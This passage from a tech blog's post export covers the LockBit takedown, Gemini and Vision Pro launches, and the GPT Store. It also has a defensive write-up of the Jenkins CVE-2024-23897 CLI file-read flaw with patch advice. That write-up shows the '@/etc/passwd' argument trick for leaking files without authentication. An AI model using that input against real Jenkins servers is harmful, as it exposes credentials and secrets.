LockBit\u0026rsquo;s encryptor, and split the proceeds. The core team maintained the malware, the leak site, and the negotiation infrastructure. It was organized crime operating with the efficiency of a SaaS startup.\nLockBit 3.0, their latest variant, even had a bug bounty program for their ransomware. They offered $1,000 to anyone who found vulnerabilities in their encryptor. The professionalization of cybercrime has been a trend for years, but LockBit took it to another level.\nHow Operation Cronos Worked # The technical details emerging from the takedown are fascinating. Law enforcement didn\u0026rsquo;t just seize domain names — they exploited a vulnerability in LockBit\u0026rsquo;s own infrastructure. Reports indicate that investigators used a PHP vulnerability (specifically CVE-2023-3824, a buffer overflow in PHP) to compromise LockBit\u0026rsquo;s backend servers.\nThe irony is thick. A group that made billions exploiting software vulnerabilities in their victims\u0026rsquo; systems was taken down by a software vulnerability in their own platform. It\u0026rsquo;s a reminder that nobody — not even sophisticated criminal operations — is immune to the basic challenges of software security.\nLaw enforcement seized 34 servers across multiple countries, froze over 200 cryptocurrency wallets, and obtained 1,000 decryption keys that are now being used to help victims recover their data without paying ransoms. They also arrested two individuals in Poland and Ukraine, with additional indictments unsealed in the US. This represents a significant escalation in coordinated international cyber law enforcement.\nPerhaps most significantly, they gained access to LockBit\u0026rsquo;s backend database, which contains records of every attack, every negotiation, and every payment. That\u0026rsquo;s an intelligence goldmine that will fuel investigations for years.\nThe Bigger Picture for Security Teams # For those of us managing infrastructure and development pipelines, the LockBit takedown is encouraging but shouldn\u0026rsquo;t change our security posture. Here\u0026rsquo;s why:\nRansomware isn\u0026rsquo;t going away. LockBit was the biggest player, but they weren\u0026rsquo;t the only one. ALPHV/BlackCat, Play, 8Base, and dozens of smaller operations continue to operate. When one group falls, affiliates migrate to competitors. We\u0026rsquo;ve seen this pattern before with REvil and Conti.\nThe attack vectors remain the same. LockBit affiliates typically gained initial access through phishing, exploiting unpatched VPN appliances (Citrix, Fortinet), and abusing remote desktop protocols. These entry points haven\u0026rsquo;t changed. If you weren\u0026rsquo;t patching your edge devices before this takedown, you\u0026rsquo;re still vulnerable — just to different groups.\nSupply chain attacks are accelerating. What concerns me more than any single ransomware group is the trend toward supply chain compromise. The techniques that groups like LockBit used are increasingly being adopted by more sophisticated actors who target build pipelines, package repositories, and CI/CD systems directly.\nPractical Takeaways # If this story motivates you to review your security posture — good. Here\u0026rsquo;s where I\u0026rsquo;d focus:\nPatch management for edge devices. VPN concentrators, firewalls, and load balancers are the number one entry point. Treat patches for these devices as emergency priority, not regular maintenance.\nBackup integrity testing. Most organizations have backups. Fewer test that those backups actually work, are isolated from the network, and can be restored in a reasonable timeframe. Ransomware groups specifically target backup infrastructure.\nNetwork segmentation. The difference between a ransomware incident and a ransomware catastrophe is often lateral movement. If an attacker compromises one system, can they reach your crown jewels? Flat networks are death.\nIncident response planning. Have a plan. Test it. Know who you\u0026rsquo;re calling at 2 AM on a Saturday. Law enforcement coordination matters — as Operation Cronos shows, they can actually help.\nMy Take # I\u0026rsquo;ve been in this industry long enough to be cynical about \u0026ldquo;landmark\u0026rdquo; law enforcement operations. We celebrated when REvil was taken down in 2022, and ransomware attacks actually increased afterward. Criminal ecosystems are resilient.\nBut Operation Cronos feels different in one important way: the psychological impact. By taking over LockBit\u0026rsquo;s own infrastructure and using it against them, law enforcement sent a message to every RaaS operator and affiliate: your infrastructure isn\u0026rsquo;t safe either. The trust model that makes ransomware-as-a-service work — affiliates trusting that the platform will protect them — just took a serious hit.\nWill this end ransomware? No. Will it create a significant disruption and potentially deter some affiliates from the business? I think so. And in the long game of cybersecurity, disruption and deterrence are about the best we can hope for.\nIn the meantime, patch your systems, test your backups, and segment your networks. The fundamentals haven\u0026rsquo;t changed.\n","date":"22 February 2024","externalUrl":null,"permalink":"/posts/240222-lockbit-takedown-operation-cronos/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"An international law enforcement coalition takes down the LockBit ransomware group’s infrastructure in a landmark operation.","title":"Operation Cronos — The LockBit Takedown and What It Means for Cybersecurity","type":"posts"},{"content":"Google dropped something genuinely significant today. Gemini 1.5 Pro, announced at their latest event, ships with a context window of up to 1 million tokens. To put that in perspective, that\u0026rsquo;s roughly 700,000 words — the equivalent of feeding an entire codebase, a full book, or hours of video into a single prompt. We\u0026rsquo;ve gone from GPT-3\u0026rsquo;s 4K tokens to this in under two years. The pace is staggering.\nWhy Context Length Matters More Than You Think # Most developers I talk to still think of LLMs as fancy autocomplete tools. You paste in a snippet, you get a snippet back. But context length is the quiet variable that determines what class of problems these models can actually tackle.\nWith 4K or even 32K tokens, you\u0026rsquo;re fundamentally limited. You can\u0026rsquo;t feed in a full repository. You can\u0026rsquo;t give the model your entire test suite alongside your implementation. You\u0026rsquo;re always doing this awkward dance of summarization and chunking, which means you\u0026rsquo;re always losing information.\nA million tokens blows that constraint wide open. Google\u0026rsquo;s demo showed Gemini 1.5 Pro ingesting the entire 402-page transcript of Apollo 11\u0026rsquo;s mission and answering detailed questions about specific moments. They also fed it a 100,000-line codebase and asked it to identify bugs. This isn\u0026rsquo;t a parlor trick — it\u0026rsquo;s a fundamentally different capability.\nThe Architecture Behind It: Mixture of Experts # What\u0026rsquo;s technically interesting here is that Google achieved this with a Mixture of Experts (MoE) architecture. Rather than activating the entire neural network for every token, MoE models route each input through a subset of specialized \u0026ldquo;expert\u0026rdquo; sub-networks. This means you can scale the model\u0026rsquo;s total parameter count without proportionally scaling the compute required for each inference.\nGoogle hasn\u0026rsquo;t published the full technical details yet, but based on what they\u0026rsquo;ve shared, Gemini 1.5 Pro is significantly more efficient than its predecessor at processing long contexts. The MoE approach isn\u0026rsquo;t new — it goes back to the early \u0026rsquo;90s — but applying it at this scale to achieve million-token context is a genuine engineering achievement.\nThe practical implication: the model can handle the long context without the latency and cost scaling linearly with input size the way traditional dense transformer models would. That\u0026rsquo;s what makes this commercially viable rather than just a research curiosity.\nWhat This Means for Developer Workflows # I\u0026rsquo;ve been thinking about what a million-token context window enables for actual software engineering work, and a few use cases stand out:\nFull-repository analysis. Instead of pointing an AI at individual files, you can feed it your entire project. Architecture reviews, dependency analysis, cross-cutting concern identification — all become possible in a single pass. No more RAG pipelines to approximate \u0026ldquo;understanding\u0026rdquo; of your codebase.\nDocumentation generation at scale. Feed the model your codebase plus your existing (probably outdated) docs, and ask it to reconcile the two. With enough context, it can identify what\u0026rsquo;s changed and what documentation is stale.\nLong-form code migration. Moving from one framework to another typically requires understanding patterns across dozens of files simultaneously. A million tokens gets you there for medium-sized projects.\nTest generation with full context. Generate tests that actually understand the relationships between components, because the model can see all the components at once.\nThe catch, of course, is that context length isn\u0026rsquo;t the same as comprehension. Google\u0026rsquo;s own benchmarks show that retrieval accuracy within very long contexts can degrade, particularly for information buried in the middle of the input — the well-documented \u0026ldquo;lost in the middle\u0026rdquo; problem. A million tokens of capacity doesn\u0026rsquo;t mean a million tokens of perfect recall.\nThe Competitive Pressure # This announcement puts serious pressure on OpenAI and Anthropic. GPT-4 Turbo currently tops out at 128K tokens. Claude 2.1 offers 200K. Google just leapfrogged both by an order of magnitude.\nNow, there\u0026rsquo;s a legitimate question about whether most applications actually need a million tokens. For the vast majority of current LLM use cases — chatbots, simple code completion, content generation — 128K is probably fine. But the history of computing tells us that when you give developers a 10x resource increase, they don\u0026rsquo;t just do the same things faster. They find entirely new things to do.\nI remember when 640KB of RAM was \u0026ldquo;enough for anyone.\u0026rdquo; Then when a 1GB hard drive seemed absurd. Every time we\u0026rsquo;ve expanded a fundamental constraint by an order of magnitude, new categories of applications emerged that nobody predicted.\nMy Take # I\u0026rsquo;m cautiously excited about this. Google has had a rough stretch with AI announcements — the Gemini Ultra launch was underwhelming relative to the hype, and the image generation issues didn\u0026rsquo;t help. But on pure technical merit, a million-token MoE model is impressive work.\nThe real question is whether Google can translate this technical advantage into developer adoption. The API pricing, rate limits, and actual real-world performance will matter more than the headline number. I\u0026rsquo;ve seen too many impressive demos that fell apart under production workloads.\nWhat I\u0026rsquo;m most interested in is how this shifts the RAG versus long-context debate. A lot of engineering effort right now goes into building retrieval-augmented generation pipelines to work around context limitations. If those limitations disappear, does all that infrastructure become unnecessary? I suspect the answer is \u0026ldquo;partially\u0026rdquo; — RAG still offers benefits for truly massive document collections — but the sweet spot is definitely shifting.\nWe\u0026rsquo;re in the middle of a capability ramp that\u0026rsquo;s unlike anything I\u0026rsquo;ve seen in three decades of software engineering. The question isn\u0026rsquo;t whether these tools will change how we work — it\u0026rsquo;s how quickly we\u0026rsquo;ll adapt.\n","date":"15 February 2024","externalUrl":null,"permalink":"/posts/240215-gemini-1-5-million-token-context/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s Gemini 1.5 Pro launches with a 1 million token context window, fundamentally reshaping what’s possible with large language models.","title":"Gemini 1.5 Pro — A Million Tokens Changes the Game","type":"posts"},{"content":"Google just made one of those moves that looks like pure marketing but is actually deeply strategic: Bard is now Gemini. The chatbot interface has been renamed, there\u0026rsquo;s a new Gemini Advanced tier powered by the Ultra 1.0 model, a dedicated Android app, and iOS integration through the Google app. If you blink, you might mistake this for a simple rebrand. It\u0026rsquo;s not.\nWhat Google is really doing is consolidating its AI identity around a single name that spans from consumer chatbot to developer API to cloud infrastructure. It\u0026rsquo;s a direct play to challenge OpenAI\u0026rsquo;s brand dominance, and for those of us building on Google\u0026rsquo;s AI tools, the implications are worth understanding.\nWhat Actually Changed # Let\u0026rsquo;s separate the substance from the branding. The core changes this week are:\nGemini Advanced ($19.99/month as part of the Google One AI Premium plan): This gives users access to the Gemini Ultra 1.0 model, which Google claims outperforms GPT-4 on various benchmarks. Ultra is the largest model in the Gemini family — the one Google has been talking about since the December announcement but hadn\u0026rsquo;t made publicly accessible until now.\nThe Gemini app: A standalone Android app that replaces Google Assistant as the default AI interface on your phone. On iOS, it\u0026rsquo;s accessible within the Google app. This is significant because it puts Gemini in the position of being a system-level assistant, not just a chat interface you visit in a browser tab.\nAPI alignment: The Gemini API, already available through Google AI Studio and Vertex AI, now shares a name with the consumer product. This matters more than it sounds — when your CEO reads about \u0026ldquo;Gemini\u0026rdquo; in the news and your development team is already using the Gemini API, that\u0026rsquo;s a much easier budget conversation than explaining why you need access to \u0026ldquo;PaLM 2 via Vertex AI.\u0026rdquo;\nThe Developer Experience: Where Things Stand # I\u0026rsquo;ve been building with Google\u0026rsquo;s AI APIs since the early PaLM days, and the current state of the Gemini developer experience is a mixed bag.\nOn the positive side, the Gemini API through Google AI Studio is genuinely good for prototyping. You can get up and running with the Pro model in minutes, the pricing is competitive (the Pro model has a generous free tier), and the multimodal capabilities — text, images, and video as inputs — are impressive. Gemini Pro handles code generation and technical reasoning well, often on par with GPT-3.5 Turbo in my testing.\nThe Vertex AI integration gives you the enterprise features you\u0026rsquo;d expect: VPC controls, data residency, fine-tuning, and model evaluation tools. If you\u0026rsquo;re already in the Google Cloud ecosystem, adding Gemini to your stack is straightforward.\nBut there are friction points. The documentation is fragmented — you\u0026rsquo;ll find yourself bouncing between Google AI Studio docs, Vertex AI docs, and general Gemini documentation, and they don\u0026rsquo;t always agree. The SDK situation is messy, with both the google-generativeai package (for AI Studio) and the google-cloud-aiplatform package (for Vertex AI) offering Gemini access through different interfaces.\nAnd honestly, the model performance gap between Pro and Ultra matters. Pro is solid but not spectacular. Ultra — now available through Gemini Advanced — is the model that\u0026rsquo;s supposed to compete with GPT-4, but developer API access to Ultra is still limited to preview.\nThe Multimodal Advantage # Where Gemini genuinely differentiates itself is in multimodal capabilities. The ability to feed images, video, and audio directly to the model as part of a prompt opens up use cases that are harder to achieve with the current OpenAI API.\nI\u0026rsquo;ve been experimenting with Gemini Pro Vision for a project that involves analyzing infrastructure diagrams — think architecture documents, network topologies, and deployment schemas. The model\u0026rsquo;s ability to parse visual information and reason about it in context is genuinely useful. Feed it a screenshot of a Kubernetes dashboard and ask what\u0026rsquo;s wrong — you\u0026rsquo;ll get surprisingly insightful responses.\nThe 1 million token context window that Google announced for Gemini 1.5 (coming soon, they say) would be transformative for code analysis, documentation processing, and long-form reasoning tasks. If that delivers on its promise, it\u0026rsquo;ll be a significant differentiator against OpenAI\u0026rsquo;s current 128K context limit.\nThe Platform Wars Are Good for Developers # Here\u0026rsquo;s the thing that matters most for us as practitioners: the competition between Google, OpenAI, Anthropic, and others is driving rapid improvement and price compression. Six months ago, a GPT-4-class model was $30-60 per million tokens. Google is now offering Gemini Pro for free up to a generous rate limit, and even the premium tiers are competitive.\nThis competition is also pushing all providers to improve their developer experience. The speed of iteration on SDKs, documentation, and tooling has been remarkable. Not always in a good way — breaking changes are frequent — but the trajectory is clearly toward better, cheaper, and more capable.\nFor my own projects, I\u0026rsquo;ve adopted a multi-model strategy. I use OpenAI\u0026rsquo;s GPT-4 for tasks where I need reliable instruction following, Anthropic\u0026rsquo;s Claude for long-context analysis, and Gemini Pro for multimodal tasks and situations where cost matters. The abstraction layers (LangChain, LiteLLM) make this relatively painless, though each model has its quirks that you learn to work around.\nMy Take # The rebrand from Bard to Gemini is more than cosmetic. It signals that Google is serious about AI as a unified platform play, not a collection of research projects with confusing names. For too long, Google\u0026rsquo;s AI story was fragmented — PaLM, Bard, Duet AI, Gemini — and developers weren\u0026rsquo;t sure which horse to back. Consolidating under Gemini provides clarity.\nThat said, Google has a pattern of launching AI products with great fanfare and then losing interest. (Remember Google Duplex? Google Lens\u0026rsquo; original AI ambitions?) The test will be whether they sustain the investment in developer experience, documentation, and model quality over the next twelve months.\nIf you\u0026rsquo;re currently building exclusively on OpenAI\u0026rsquo;s stack, this is a good moment to experiment with Gemini. Not to switch — to diversify. The AI landscape is moving too fast to be locked into a single provider, and Google\u0026rsquo;s multimodal capabilities and competitive pricing make it a legitimate option for production workloads.\nThe AI naming game is getting real, and for once, the marketing actually reflects genuine technical progress. That\u0026rsquo;s a good thing for all of us building in this space.\n","date":"8 February 2024","externalUrl":null,"permalink":"/posts/240208-google-gemini-rebrand-ai-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google retires the Bard brand and goes all-in on Gemini. Behind the marketing refresh is a real technical shift with implications for developers building on Google’s AI stack.","title":"Google Rebrands Bard to Gemini — The AI Naming Game Gets Real","type":"posts"},{"content":"Tomorrow, February 2nd, Apple Vision Pro goes on sale in the United States. At $3,499, it\u0026rsquo;s not a consumer device — Apple knows this, the press knows this, and most importantly, we as developers should know this. What it is, though, is Apple\u0026rsquo;s most significant platform bet since the iPhone, and the developer implications deserve serious examination.\nI\u0026rsquo;ve been following the visionOS developer tools since they were announced at WWDC last June, and I\u0026rsquo;ve had access to the simulator and documentation since the beta program opened. Here\u0026rsquo;s my honest assessment of where things stand from a software development perspective.\nvisionOS: A Familiar-Yet-Foreign SDK # If you\u0026rsquo;ve built iOS or macOS apps with SwiftUI, the on-ramp to visionOS development is surprisingly gentle. Apple has designed the SDK so that many existing SwiftUI views can be placed in a \u0026ldquo;window\u0026rdquo; in spatial space with minimal modifications. Your standard 2D interface becomes a floating panel that users can position in their physical environment.\nThe development environment centers around Xcode 15.2 with the visionOS simulator, which runs on any recent Mac. You don\u0026rsquo;t need the actual hardware to start building, which is the right call from a platform adoption standpoint. The simulator renders a 3D space on your 2D screen with click-and-drag controls for eye tracking and hand gestures.\nWhere things get interesting — and significantly more complex — is when you move beyond 2D windows into what Apple calls \u0026ldquo;volumes\u0026rdquo; and \u0026ldquo;immersive spaces.\u0026rdquo; Volumes are 3D containers that live alongside the user\u0026rsquo;s real environment, while immersive spaces can range from mixed reality overlays to fully immersive virtual environments.\nBuilding for volumes requires working with RealityKit, Apple\u0026rsquo;s 3D rendering framework, and potentially Reality Composer Pro for designing 3D scenes. If you\u0026rsquo;ve never worked with 3D rendering pipelines, the learning curve here is steep. Coordinate systems, spatial anchoring, collision detection, and 3D asset management are all areas where traditional app developers will need to upskill.\nThe Input Model Changes Everything # What fascinates me most about visionOS from a development perspective is the input model. There\u0026rsquo;s no touch screen, no mouse, no trackpad. The primary inputs are eye tracking (where you look), hand gestures (pinch, tap, drag), and voice (through Siri integration).\nThis fundamentally changes how you think about interaction design. Hit targets need to be larger and more spaced out because eye tracking has inherent precision limitations. You can\u0026rsquo;t rely on hover states — or rather, \u0026ldquo;hover\u0026rdquo; now means \u0026ldquo;the user is looking at this element.\u0026rdquo; Gesture recognition needs to be forgiving because users\u0026rsquo; hands are in free space, not resting on a stable surface.\nFor developers who\u0026rsquo;ve been building web and mobile interfaces for years, this is both exciting and humbling. Many of our accumulated instincts about UI design don\u0026rsquo;t directly translate. The spatial computing paradigm genuinely requires rethinking interaction patterns from first principles.\nThe accessibility implications are also significant. Apple has included head tracking, voice control, and pointer-based alternatives for users who can\u0026rsquo;t use the standard eye-and-hand input model, but as developers, we need to test these pathways deliberately.\nThe Enterprise Case Is Stronger Than Consumer # Having watched the pre-release coverage and developer discussions, I\u0026rsquo;m increasingly convinced that Vision Pro\u0026rsquo;s near-term value is in enterprise and professional applications, not consumer entertainment.\nConsider the use cases that make sense at this price point: architectural visualization where clients can walk through buildings before construction, medical imaging where surgeons can examine 3D models of patient anatomy, remote collaboration where distributed teams can share a virtual workspace, and industrial design where engineers can prototype in spatial context.\nThese are applications where the cost of the device is trivial compared to the value it delivers, and where the immersive 3D environment provides genuine advantages over flat screens. If your company works in any of these domains, exploring visionOS development now makes strategic sense.\nThe consumer use cases — watching movies on a virtual big screen, casual gaming, social media — feel like justifications rather than motivations. They\u0026rsquo;re nice-to-haves that don\u0026rsquo;t warrant a $3,499 investment for most people. Apple will eventually bring the price down, but that\u0026rsquo;s a future-generation play.\nWhat About the Web? # Here\u0026rsquo;s something that hasn\u0026rsquo;t gotten enough attention: Safari on visionOS supports WebXR. That means existing WebXR content — 3D models, spatial experiences, AR overlays — works in Vision Pro\u0026rsquo;s browser without any native app development.\nFor web developers, this is actually the most accessible entry point into spatial computing. If you\u0026rsquo;ve built WebXR experiences for other headsets or mobile AR browsers, they\u0026rsquo;ll work on Vision Pro. The web platform gives you cross-device reach that native visionOS apps can\u0026rsquo;t match.\nI\u0026rsquo;ve been experimenting with Three.js and A-Frame projects in the visionOS simulator, and the results are promising. The rendering performance is impressive, and the integration with the system\u0026rsquo;s eye-tracking input model works through standard WebXR APIs.\nIf you want to dip your toes into spatial computing without committing to the Apple ecosystem, WebXR is the way to go.\nMy Take # I\u0026rsquo;m not rushing out to buy a Vision Pro. At this price point and first-generation maturity level, it\u0026rsquo;s a developer kit wearing consumer clothing. But I am taking the platform seriously.\nApple has a track record of creating markets that didn\u0026rsquo;t exist before — or rather, of making markets viable that others explored prematurely. The iPhone wasn\u0026rsquo;t the first smartphone, the iPad wasn\u0026rsquo;t the first tablet, and Vision Pro isn\u0026rsquo;t the first mixed reality headset. But Apple tends to get the developer experience right in ways that matter for long-term ecosystem growth.\nMy practical advice: if you\u0026rsquo;re a SwiftUI developer, spend a weekend with the visionOS simulator. The 2D window mode is trivial to adopt, and it\u0026rsquo;ll give you a feel for the platform\u0026rsquo;s potential. If you\u0026rsquo;re a web developer, explore WebXR — it\u0026rsquo;s your most efficient path to spatial computing. And if you\u0026rsquo;re in an enterprise context where spatial visualization adds real value, start prototyping now while the competition is still figuring things out.\nSpatial computing isn\u0026rsquo;t going to replace our flat screens anytime soon. But it\u0026rsquo;s going to become another surface we build for, and the developers who understand it early will have a meaningful advantage.\n","date":"1 February 2024","externalUrl":null,"permalink":"/posts/240201-apple-vision-pro-spatial-computing-dev/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple Vision Pro launches tomorrow and the developer ecosystem is already forming. Here’s what spatial computing means for the rest of us who build software.","title":"Apple Vision Pro Arrives — A Developer's First Impressions of Spatial Computing","type":"posts"},{"content":"If you run Jenkins — and statistically, there\u0026rsquo;s a decent chance you do — you need to pay attention to CVE-2024-23897. Disclosed this week by the Jenkins security team, this is a critical vulnerability in the Jenkins CLI that allows unauthenticated attackers to read arbitrary files on the Jenkins controller\u0026rsquo;s file system. Under certain configurations, it can lead to remote code execution.\nThe vulnerability has a CVSS score of 9.8, and proof-of-concept exploits are already circulating. If your Jenkins instance is exposed to the internet — even behind a VPN — patch now, read this later.\nThe Technical Details # The vulnerability lives in Jenkins\u0026rsquo; built-in CLI, which uses the args4j library to parse command arguments. Here\u0026rsquo;s the clever part: args4j has a feature where any argument starting with @ is interpreted as a file path, and the file\u0026rsquo;s contents are expanded as arguments. This is meant to be a convenience feature for passing arguments via files.\nThe problem is that this expansion happens before authentication and authorization checks. An attacker can send a CLI command with @/etc/passwd (or any other file path) and the file\u0026rsquo;s contents will be included in error messages or response data, effectively leaking the file to the attacker.\nThe impact varies depending on your Jenkins configuration:\nWith \u0026ldquo;Allow anonymous read access\u0026rdquo; enabled: Attackers can read entire files. This is the worst case and it\u0026rsquo;s game over — they can grab credentials, private keys, and secrets stored on the controller. Without anonymous read access: Attackers can still read the first few lines of files, which is often enough to extract binary secrets like cryptographic keys. With specific plugins: Certain configurations enable full remote code execution through this vector. What makes this particularly nasty is that the Jenkins CLI is enabled by default. Unless you\u0026rsquo;ve explicitly disabled it, your instance is potentially vulnerable. This is particularly critical given Jenkins\u0026rsquo; role in software supply chain security.\nWhy Jenkins Keeps Getting Hit # This isn\u0026rsquo;t Jenkins\u0026rsquo; first critical vulnerability, and it won\u0026rsquo;t be the last. The tool occupies an uncomfortable position in the DevOps ecosystem: it\u0026rsquo;s incredibly widely deployed, it\u0026rsquo;s often running with elevated privileges, and many installations are maintained with a \u0026ldquo;set it and forget it\u0026rdquo; mentality. Jenkins and related CI/CD tools have been frequent targets in supply chain attacks.\nIn my experience, Jenkins instances tend to accumulate technical debt faster than almost any other piece of infrastructure. They start as simple build servers, then get plugins added, then pipelines get complex, then nobody wants to touch them because everything might break. The result is Jenkins servers running outdated versions with a graveyard of unused plugins, each one a potential attack surface.\nThe CI/CD server is also one of the most valuable targets in any organization. It typically has access to source code repositories, deployment credentials, cloud provider keys, and production infrastructure. Compromise a Jenkins server and you\u0026rsquo;ve often compromised the entire software delivery pipeline, as we\u0026rsquo;ve seen in multiple supply chain incidents.\nImmediate Remediation Steps # Here\u0026rsquo;s what you should do right now, in order of priority:\n1. Patch immediately. Jenkins 2.442 and LTS 2.426.3 fix the vulnerability. If you can\u0026rsquo;t patch immediately, disable the CLI by setting the Java system property jenkins.cli.disabled=true or by removing the CLI endpoint entirely.\n2. Audit your exposure. Check whether your Jenkins instance is reachable from the internet. You\u0026rsquo;d be surprised how many \u0026ldquo;internal\u0026rdquo; Jenkins servers end up exposed through misconfigured load balancers or VPN split-tunnel configurations. Internet exposure of internal infrastructure is a common source of compromise, similar to the Microsoft Exchange attacks we\u0026rsquo;ve seen.\n3. Rotate secrets. If your Jenkins controller has been exposed, assume the worst. Rotate all credentials stored in Jenkins — SSH keys, API tokens, cloud provider credentials, everything. Yes, this is painful. Do it anyway.\n4. Review your plugin inventory. While you\u0026rsquo;re at it, audit your installed plugins. Remove anything you\u0026rsquo;re not actively using. Each plugin is additional attack surface, and many haven\u0026rsquo;t been updated in years.\n5. Check your authentication model. If you had anonymous read access enabled, you were fully exposed. Disable it and implement proper RBAC. Consider integrating with your organization\u0026rsquo;s SSO/LDAP rather than managing Jenkins users independently.\nThe Bigger Conversation: CI/CD Security Posture # This vulnerability is a symptom of a broader problem: we\u0026rsquo;ve collectively underinvested in CI/CD security. We lock down production environments with network policies, runtime security, and elaborate access controls, but the build server that has the keys to deploy to all those environments often sits in a dusty corner of the infrastructure with default settings.\nI\u0026rsquo;ve been doing security reviews for teams moving to modern CI/CD platforms, and the Jenkins migrations invariably uncover horror shows: build scripts with hardcoded credentials, shared service accounts with admin privileges, plugins that haven\u0026rsquo;t been updated in three years, and backup scripts that dump everything including secrets to unencrypted storage.\nIf this vulnerability is a wake-up call for your organization, let it be a productive one. Don\u0026rsquo;t just patch and move on. Take the time to review your CI/CD security posture holistically. Map out what credentials your build system has access to, implement least-privilege access, enable audit logging, and consider whether it\u0026rsquo;s time to move to a more modern, security-focused CI/CD platform.\nMy Take # I\u0026rsquo;ve run Jenkins for longer than I\u0026rsquo;d sometimes like to admit. It\u0026rsquo;s a workhorse, and for all its warts, it\u0026rsquo;s incredibly flexible. But CVE-2024-23897 is a reminder that flexibility often comes at the cost of security, especially when the defaults are permissive.\nIf you\u0026rsquo;re still running Jenkins, patch immediately and use this as an opportunity to harden your setup. If you\u0026rsquo;ve been considering a migration to GitHub Actions, GitLab CI, or another platform, this might be the push you need to make the business case.\nThe CI/CD pipeline is the crown jewels of your development infrastructure. It deserves the same security attention you give to production. No less.\n","date":"25 January 2024","externalUrl":null,"permalink":"/posts/240125-jenkins-cve-2024-23897-cicd-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A critical Jenkins vulnerability allows arbitrary file reads through the CLI. Here’s why this matters more than your typical CVE and what it reveals about CI/CD security.","title":"Jenkins Under Fire — CVE-2024-23897 and the Cost of Legacy Infrastructure","type":"posts"},{"content":"Last week, OpenAI finally launched the GPT Store, and with it, the company is making its most significant platform play yet. After teasing custom GPTs at DevDay back in November, the store is now live for ChatGPT Plus, Team, and Enterprise subscribers. It\u0026rsquo;s essentially an app store for AI agents — and if that comparison makes you think of both the promise and the pitfalls of Apple\u0026rsquo;s App Store circa 2008, you\u0026rsquo;re not alone.\nI spent the past week poking around the store, building a couple of custom GPTs myself, and talking to other developers doing the same. Here\u0026rsquo;s my assessment of where things stand and where they might be heading.\nWhat the GPT Store Actually Is # At its core, the GPT Store is a marketplace where anyone with a ChatGPT Plus subscription can publish custom GPTs — specialized versions of ChatGPT configured with specific instructions, knowledge files, and capabilities. These aren\u0026rsquo;t fine-tuned models; they\u0026rsquo;re more like sophisticated prompt wrappers with persistent configuration and optional API integrations through what OpenAI calls \u0026ldquo;Actions.\u0026rdquo;\nThe store is organized into categories: DALL·E, Writing, Research, Programming, Education, and Lifestyle. There\u0026rsquo;s a search function, trending lists, and featured picks curated by OpenAI. The initial catalog already has over three million custom GPTs, which tells you both that the barrier to creation is low and that discovery is going to be a massive challenge.\nBuilding a custom GPT takes minutes if you\u0026rsquo;re doing something simple — you\u0026rsquo;re essentially having a conversation with GPT-4 about what you want the bot to do, uploading any reference documents, and optionally connecting external APIs. It\u0026rsquo;s impressively accessible for non-developers, which is both the point and the concern.\nThe Developer Angle: Actions and API Integration # Where things get interesting for us as developers is the Actions framework. Actions let your custom GPT call external APIs using OpenAPI specifications. You define the endpoints, the authentication method, and the schema, and GPT-4 figures out when and how to call them based on the conversation context.\nI built a GPT that integrates with our internal documentation API — essentially a conversational interface over our engineering wiki. The setup was straightforward: export the OpenAPI spec, configure OAuth, and let the GPT handle the rest. It works surprisingly well for lookup-style queries, though it struggles with multi-step workflows that require maintaining state across several API calls, which is an inherent challenge in LLM applications.\nThe real potential here is in vertical applications. A GPT that can query your monitoring stack, cross-reference with your incident database, and suggest runbook steps — that\u0026rsquo;s genuinely useful. But we\u0026rsquo;re a long way from reliable implementations of that vision. The context window limitations, the occasional hallucination about API parameters, and the lack of proper error handling make current Actions feel more like prototypes than products.\nThe Economics: Revenue Sharing Is Coming # OpenAI has announced a revenue-sharing program for GPT creators, set to launch in Q1 2024. Details are sparse — they\u0026rsquo;ve mentioned it\u0026rsquo;ll be based on \u0026ldquo;user engagement\u0026rdquo; — but this is clearly the carrot designed to attract serious developers to the platform.\nI\u0026rsquo;m skeptical about the economics for individual creators. If the App Store taught us anything, it\u0026rsquo;s that these marketplaces tend toward a winner-take-all dynamic. The top 1% of GPTs will capture the vast majority of engagement, and with three million entries already, standing out is a needle-in-a-haystack problem.\nThe more interesting economic play is for companies that use custom GPTs as a distribution channel for their existing services. If you\u0026rsquo;re a SaaS company, wrapping your API in a conversational GPT interface is essentially a new customer acquisition channel — one that lives inside ChatGPT\u0026rsquo;s massive user base.\nThe Platform Risk Discussion # Let\u0026rsquo;s talk about the elephant in the room: platform dependency. Building on OpenAI\u0026rsquo;s platform means accepting that they control the rules, the distribution, and the underlying model. They can change the Terms of Service, adjust the ranking algorithm, or deprecate features at will.\nWe\u0026rsquo;ve seen this movie before. Facebook\u0026rsquo;s app platform, Twitter\u0026rsquo;s API ecosystem, Slack\u0026rsquo;s app directory — all went through cycles of openness followed by constraint. I\u0026rsquo;m not saying OpenAI will follow the same path, but any developer building a business on the GPT Store should have a clear-eyed view of the risks.\nThe smart play, as always, is to treat the GPT Store as a channel, not a foundation. Build your core logic in your own stack, expose it via APIs, and use the GPT Store as one of several interfaces. If the platform changes, you\u0026rsquo;ve lost a distribution channel, not your entire product.\nWhat\u0026rsquo;s Missing # A few things I noticed that are conspicuously absent:\nAnalytics: There\u0026rsquo;s no dashboard for GPT creators to understand usage patterns, user retention, or conversation quality. You\u0026rsquo;re publishing into a void.\nVersion control: There\u0026rsquo;s no proper versioning system for GPTs. You can edit your GPT, but there\u0026rsquo;s no way to roll back, maintain multiple versions, or do staged rollouts.\nTeam collaboration: Building GPTs is currently a solo activity. There\u0026rsquo;s no way for a team to co-manage a GPT, which limits its usefulness for corporate deployments.\nTesting frameworks: There\u0026rsquo;s no way to systematically test your GPT\u0026rsquo;s responses before publishing. Given that these are customer-facing products, the lack of QA tooling is a significant gap.\nMy Take # The GPT Store is an important moment in AI development, but not because of what it is today. It\u0026rsquo;s important because it signals OpenAI\u0026rsquo;s strategic direction: they want to be the platform, not just the model provider. The store is their bid to create an ecosystem lock-in that goes beyond API access.\nFor developers, the immediate value is modest. Custom GPTs are useful for internal tools and quick prototypes, but the lack of proper development tooling makes them hard to take seriously for production applications.\nThe real question is whether OpenAI will invest in the developer experience. If they add proper analytics, testing frameworks, and team features, the GPT Store could become a meaningful platform. If they don\u0026rsquo;t, it\u0026rsquo;ll be another app store full of novelty bots that nobody uses after the first week.\nI\u0026rsquo;ll be watching the 